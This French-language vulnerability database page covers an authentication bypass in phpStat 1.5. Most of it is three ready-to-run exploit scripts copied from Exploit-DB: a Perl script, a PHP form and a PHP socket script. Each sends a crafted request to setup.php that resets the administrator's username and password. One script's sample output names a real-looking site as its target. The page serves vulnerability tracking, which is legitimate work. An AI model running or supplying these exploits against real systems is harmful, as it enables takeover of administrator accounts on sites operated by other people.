Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-20 |
Improper Input Validation The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 1016
Date de publication : 2005-05-29 22h00 +00:00
Auteur : Alpha_Programmer
EDB Vérifié : Yes
#!/usr/bin/perl
#####################################################################
#T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
#####################################################################
# EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability
#
#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v )
#E-Mail :
[email protected]
#
#This Xpl Change Admin's Pass in This Portal !!
#Discovered by: SoulBlack
#
#Vulnerable Version : phpStat 1.5
#
#####################################################################
# Gr33tz To ==> mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com
#
# So Iranian Hacking & Security Teams :
#
# Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT
#####################################################################
use IO::Socket;
if (@ARGV < 3)
{
print "\n==========================================\n";
print " \n -- Exploit By Alpha Programmer --\n\n";
print " Trap-Set UnderGrounD Hacking Team \n\n";
print " Usage: <T4rg3t> <DIR> <Password>\n\n";
print "==========================================\n\n";
print "Examples:\n\n";
print " phpStat.pl www.Site.com /phpstat/ 12345\n";
exit();
}
my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
print "C0nn3cted\n";
$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n\n\n\n";
print "[+]Sending H3ll Packet ...\n";
print $remote $http;
sleep(1);
print "[+]Wait For Authentication Bypass ...\n";
sleep(100);
while (<$remote>)
{
}
print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n";
print "[+]User: admin\n";
print "[+]Pass: $ARGV[2]";
# milw0rm.com [2005-05-30]
Exploit Database EDB-ID : 1017
Date de publication : 2005-05-29 22h00 +00:00
Auteur : mh_p0rtal
EDB Vérifié : Yes
<?php
error_reporting(E_PARSE);
/*
================================================================
PHP Stat Administrative User Authentication Bypass POC Exploit
================================================================
====Trap-Set Underground Hacking Team===========mh_p0rtal============
Greetz to : Alpha_programmer , Oil_karchack , Str0ke And Iranian Hacking & Security Teams :
Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam
, CrouZ Security Team , Simorgh-ev Security Team ,
====================^^^^^^^^^^^^^^^^^^^-=========================
*/
# Config ________________________________
# address - example: http://www.site.com/setup.php Or www.site.com /dir/setup.php
$url = "http://www.site.com/setup.php";
# EnD ___________________________________
print "<form action=\"$url?check=yes&username=$username&password=$password\" >";
print "<input type=\"hidden\" name=\"check\" value=\"yes\">";
print "Username : <input type=\"text\" name=\"username\" value=\"admin\" size=\"25\"><br>";
print "Password : <input type=\"text\" name=\"password\" value=\"abc123\" size=\"25\"><br>";
print ("<input type=submit value=::Change. > \n");
print "</form>";
//------------------------------------------------------End.
?>
# milw0rm.com [2005-05-30]
Exploit Database EDB-ID : 1018
Date de publication : 2005-05-29 22h00 +00:00
Auteur : Nikyt0x
EDB Vérifié : Yes
<?
/*
**************************************************************
PHP Stat Administrative User Authentication Bypass POC Exploit
Code by Nikyt0x - Soulblack Security Research
**************************************************************
Advisory:
http://www.soulblack.com.ar/repo/papers/phpstat_advisory.txt
Saludos:
Soulblack Staff, Status-x, NeosecurityTeam,
KingMetal, SWP, Trespasser...
[email protected]
http://www.nikyt0x.tk
**************************************************************
**This Exploit Change Admin Username and Password
**Username: admin
**Password: admin
**************************************************************
php sbphpstatpoc.php www.spazfarm.com /spazstats/setup.php
==============================================================
PHP Stat Administrative User Authentication Bypass POC Exploit
==============================================================
by Nikyt0x - Soulblack Security Research
[+] Testing: www.spazfarm.com
[+] Socket
[+] Sending Exploit
[+] OK
Open www.spazfarm.com/spazstats/setup.php
Username: admin
Password: 123456
**************************************************************
*/
// username and password
$username = "admin";
$password = "123456";
function sh0w()
{
echo "\n ==============================================================\n";
echo " PHP Stat Administrative User Authentication Bypass POC Exploit\n";
echo " ==============================================================\n";
echo " by Nikyt0x - Soulblack Security Research\n\n";
}
if ($argc != 3)
{
sh0w();
echo "\n\n Usage:\n sbphpstatpoc.php www.site.com /dir/to/setup.php\n";
exit();
}
if(!ereg('setup.php',$argv[2])) {
echo "URL to setup.php Incorrect.\n";
exit(0);
}
sh0w();
echo " [+] Testing: $argv[1]\n";
$s0ck3t = fsockopen($argv[1], 80);
if (!$s0ck3t) {
echo " [-] Socket\n";
exit(0);
} else {
$petici0n = "GET $argv[2]?check=yes&username=$username&password=$password HTTP/1.1\r\n";
$petici0n .= "Host: $argv[1]\r\n";
$petici0n .= "Connection: Close\r\n\r\n";
echo " [+] Socket\n";
if(!fwrite($s0ck3t, $petici0n))
{
echo " [-] Sending Exploit\n";
exit(0);
}
echo " [+] Sending Exploit\n";
while (!feof($s0ck3t)) {
$g3tdata = fgets($s0ck3t, 1024);
if (eregi('Setup has been updated',$g3tdata))
{
echo " [+] OK\n\n";
echo " Open $argv[1]$argv[2]\n\n Username: $username\n Password: $password\n";
exit();
}
}
fclose($s0ck3t);
}
?>
# milw0rm.com [2005-05-30]
Products Mentioned
Configuraton 0
Phpstat>>Phpstat >> Version -
Références